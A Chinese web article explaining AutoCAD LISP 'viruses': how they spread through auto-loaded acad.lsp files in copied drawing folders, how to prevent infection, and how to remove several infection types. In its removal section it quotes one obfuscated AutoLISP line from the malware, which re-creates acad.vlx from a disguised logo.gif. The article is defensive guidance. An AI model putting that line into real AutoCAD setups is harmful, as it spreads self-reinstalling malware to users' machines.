cad病毒是什么?遇到cad病毒應(yīng)該怎么清理?

CAD病毒可以叫做AUTOCAD病毒,因為這些病毒都是針對AUTOCAD的自動加載機制開發(fā)的惡意小程序,因為其他CAD軟件自動加載的文件名不同,例如浩辰CAD的相關(guān)文件是gcad開頭的,所以這些病毒不會影響浩辰CAD等這些軟件

雖然網(wǎng)上有很多人遇到過CAD病毒,但沒有遇到CAD病毒的人還是多數(shù),假如你現(xiàn)在還沒有中過CAD病毒,只需要在復(fù)制圖紙時注意目錄下非DWG文件是否有類似CAD病毒的文件,只要做好預(yù)防,你就不會受到CAD病毒的困擾。文章源自四五設(shè)計網(wǎng)-http://www.wasochina.com/52183.html

1、CAD病毒是怎么傳播的?文章源自四五設(shè)計網(wǎng)-http://www.wasochina.com/52183.html

所謂CAD病毒,其實就是一個CAD小的二次開發(fā)程序,它利用CAD自動加載程序自動進行加載,只對CAD起作用,有些只是一些小惡作劇,對軟件操作沒有什么影響,但有些卻會對操作有影響。CAD病毒程序不是傳統(tǒng)意義上的病毒,因此,用諾頓、金山毒霸等是不能殺除的,360曾經(jīng)專門提供過CAD殺毒的功能,可見有一段時間CAD病毒是多么猖獗,但現(xiàn)在版本好像又沒有了。CAD病毒的作用機制是這樣的:某臺機器上沒有這個病毒程序,在通過網(wǎng)上鄰居拷貝別人的圖紙時,大家經(jīng)常會把整個目錄拷貝過來,如果拷貝的這個目錄中包含有acaddoc.lsp、acad.lsp和acadapp.lsp,你的機器就有了這個病毒,但是還沒有起作用。當你用CAD打開這個圖紙文件時,CAD會自動加載該目錄下的acad.lsp或acaddoc.lsp,這個LSP程序會檢測你的CAD支持support目錄下是否有這兩個文件,如果沒有,它會自動在那里創(chuàng)建他們的副本。文章源自四五設(shè)計網(wǎng)-http://www.wasochina.com/52183.html

cad病毒是什么?遇到cad病毒應(yīng)該怎么清理?-1文章源自四五設(shè)計網(wǎng)-http://www.wasochina.com/52183.html

2、以后,在你打開別的圖紙時,它會在判斷你要打開的圖紙目錄下有沒有這兩個文件,如果沒有,它又在該目錄下創(chuàng)建這兩個文件的副本。就這樣,你的機器上的dwg文件目錄中逐步都有了這個程序。隨著別人按照目錄拷貝你的dwg文件,他們也感染上了。因此,如果你的機器上沒有CAD病毒程序,只要你從別處拷貝圖紙時,只拷貝dwg文件就不會感染CAD病毒了。文章源自四五設(shè)計網(wǎng)-http://www.wasochina.com/52183.html

病毒會直接將代碼寫到AUTOCAD自動加載的acadXXXX.lsp或acaddocXXXX.lsp這類文件中,有的會寫到其他LSP程序中,然后在acadXXXX.lsp或acaddocXXXX.lsp添加加載這個LSP程序的代碼。文章源自四五設(shè)計網(wǎng)-http://www.wasochina.com/52183.html

cad病毒是什么?遇到cad病毒應(yīng)該怎么清理?-2文章源自四五設(shè)計網(wǎng)-http://www.wasochina.com/52183.html

3、CAD病毒怎么預(yù)防?文章源自四五設(shè)計網(wǎng)-http://www.wasochina.com/52183.html

其實我們了解了CAD病毒的作用原理即使利用CAD自動加載的LSP程序傳播和加載,如果你的CAD現(xiàn)在還沒有中病毒,其實預(yù)防的方法很簡單,就是在復(fù)制圖紙的時候,不要整個目錄復(fù)制,即使整目錄復(fù)制后,也要檢查一下目錄中是否有.fas .lsp .mnl .arx類型文件文件,如果有的話,建議刪除以后再用CAD打開圖紙。只要不拷貝不明的程序文件,99%不會中毒。文章源自四五設(shè)計網(wǎng)-http://www.wasochina.com/52183.html

此外,從網(wǎng)上下載LSP插件和程序的時候有要小心,確認程序是正常的工具和插件后再加載使用,但還好,我從網(wǎng)上下載過很多種CAD插件,到還沒有因為加載這些程序中CAD病毒。文章源自四五設(shè)計網(wǎng)-http://www.wasochina.com/52183.html

裝好CAD系統(tǒng)后,在沒有被病毒感染前,將CAD安裝和支持目錄中的文件的屬性設(shè)置為只讀,可以減少中毒的機率。手機游戲下載app.diuta.com四五設(shè)計網(wǎng)www.wasochina.com設(shè)計學(xué)徒自學(xué)網(wǎng)www.sx1c.com

cad病毒是什么?遇到cad病毒應(yīng)該怎么清理?-3

4、CAD病毒如何查殺?

CAD病毒的種類很多,因此查殺的方法也不完全一樣,其實基本方法就是將可能傳播和加載病毒的相關(guān)文件都找出來刪掉。

這里列舉一下網(wǎng)上收集的各種方法,大家如果遇到病毒,可以嘗試用其中的一種方法來處理一下,看是否起作用。

cad病毒是什么?遇到cad病毒應(yīng)該怎么清理?-4

5、中毒現(xiàn)象一:1.當中毒后不能使用圖層和標注命令.2. 新建和打開圖檔會自動生成一個acad.vlx的文件.3 當新建一個圖檔時.可以用標注命令和圖層.但是當關(guān)閉后在打開圖檔則不能使用圖層和標注命令.處理方法:1、 仔細搜索查看CAD安裝目錄后我發(fā)現(xiàn),Express目錄的acetauto.lsp文件和Support目錄的ai_utils.lsp文件都被修改了。同時Help目錄內(nèi)也多出了一個logo.gif文件,仔細查看它的字節(jié)大小,確定它就是這個acad.vlx文件的副本。2、打開acetauto.lsp和ai_utils.lsp文件,跟我備份的原文件對比后發(fā)現(xiàn),它們都被添加了一行代碼:

(vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))

這句代碼的意思就是搜索CAD支持路徑下是否有l(wèi)ogo.gif文件,如有,則復(fù)制logo.gif文件到CAD支持路徑并重命名為acad.vlx。這就是為什么全盤搜索acad.vlx刪除后,打開CAD后又會全新生成這個acad.vlx文件的原因了。3 、關(guān)閉CAD,全盤搜索acad.vlx刪除,再將CAD的Help目錄內(nèi)的logo.gif文件刪除即可。

cad病毒是什么?遇到cad病毒應(yīng)該怎么清理?-5

6、中毒現(xiàn)象二

如果你打開CAD圖紙,發(fā)現(xiàn)圖紙上只有一句英文:MUST re_cover!,以前畫的圖全沒有了!這時,你不要驚慌。關(guān)閉CAD后,全盤搜索acad.vlx,將其中的一個acad.vlx文件改名為a.vlx留用,然后把搜索到的acad.vlx全部刪除。重新啟動CAD,打開那個被破壞的圖形文件,在“工具”菜單下“加載應(yīng)用程序”,選擇加載備份的a.vlx文件,在命令行輸入re_cover就可以恢復(fù)被打亂隱藏的圖紙了。所有被破壞的文件修復(fù)后,關(guān)閉CAD,再全盤搜索acad.vlx一次,將搜索到的acad.vlx全部刪除。

cad病毒是什么?遇到cad病毒應(yīng)該怎么清理?-6

7、中毒現(xiàn)象三

出現(xiàn)提示對話框,黨不會虧待你、好好干等等,專業(yè)軟件無法正常運行,一些命令,如移動、平移操作不正常等等。

只所以將這些現(xiàn)象都放到一起,是因為網(wǎng)上也沒有同意的說法,因此將這些病毒歸類在一起。網(wǎng)上提供的方法有兩種:

一、在CAD內(nèi)部用語句自動搜索文件后刪除,

(while (or (setq a (findfile"acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-deletea))

這句話的意思就是在CAD的支持路徑下搜索acad.fas和lcm.fas這兩個文件并刪除,顯然這種方法只能解決針對某一種病毒的問題。CAD自學(xué)網(wǎng)www.itk3.com設(shè)計小助手www.1rrp.com

二、直接在WINDOWS資源管理器中搜索并刪除相關(guān)文件。

既然要搜索和刪除,就刪除得徹底一些,建議將acad*.lsp、acad*.fas、acad*.vlx、acad*.mnl這些CAD可能自動加載的文件都搜出來后,全部刪除掉。其實如果對LISP程序有一定了解,到可以研究一下CAD目錄下那些上述擴展名的文件有變化,而且同一個文件名文件出現(xiàn)在圖紙目錄下或ACAD目錄下,這樣的文件就很有可能是病毒。

在刪除這些文件后我們可以啟動一下CAD,看看癥狀是否消除。比如有些CAD病毒會修改CAD的一些變量,比如導(dǎo)致出現(xiàn)鼠標中間無法平移、填充無法顯示等,很多人在網(wǎng)上搜索類似問題的答案,修改變量后仍不起作用就是病毒在起作用,在將病毒相關(guān)文件刪除后可以再次嘗試修改這些變量,看看這些變量設(shè)置是否有效,網(wǎng)上提供了設(shè)置相關(guān)變量的語句,可以直接將這些語句復(fù)制到命令行來設(shè)置變量,語句如下:

(setvar "zoomfactor" 40)(setvar"mbuttonpan"1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)

zoomfactor是縮放因子,可以控制鼠標滾輪縮放時每次滾動縮放的比例

mbuttonpan是設(shè)置鼠標中間是否可以平移

HIGHLIGHT是設(shè)置圖形選中后是否高亮顯示

fillmode是設(shè)置填充是否顯示的變量

我們也可以直接在命令上輸入上述變量,回車后,輸入后面的值,當然如果我們CAD中毒后沒有出現(xiàn)上述癥狀,就不用再設(shè)置這些變量了。

如果刪除了上述文件后相關(guān)癥狀還沒有消除的話,我們可以檢查一下CAD安裝和APPDATA目錄中LISP程序有什么變化,比如修改日期跟同目錄的其他文件不一樣,可以檢查一下是否有CAD病毒相關(guān)代碼。

確認哪個程序可能包含可疑代碼并不太容易,可以再將CAD安裝和搜索路徑中所有*.lsp、*.fas、*.vlx、*.mnl都搜索出來刪除,啟動CAD再檢查。

還有更徹底的方法就是將CAD卸載并將CAD安裝和APPDATA中CAD相關(guān)的目錄刪除空,將所有有可能是CAD病毒的文件或包含加載病毒代碼的文件都刪除了;然后再重新安裝CAD,這也是最后一招了。

如果我們刪除了acad開頭的LSP相關(guān)文件后CAD軟件基本運行正常了,但這些文件刪除可能會影響CAD上的一些二次開發(fā)軟件的啟動和運行,如果出現(xiàn)這種問題,需要重新安裝或修復(fù)專業(yè)軟件。

繼續(xù)閱讀
我的微信
微信掃一掃
weinxin
我的微信
惠生活福利社
微信掃一掃
weinxin
我的公眾號
 

發(fā)表評論

匿名網(wǎng)友
:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

拖動滑塊以完成驗證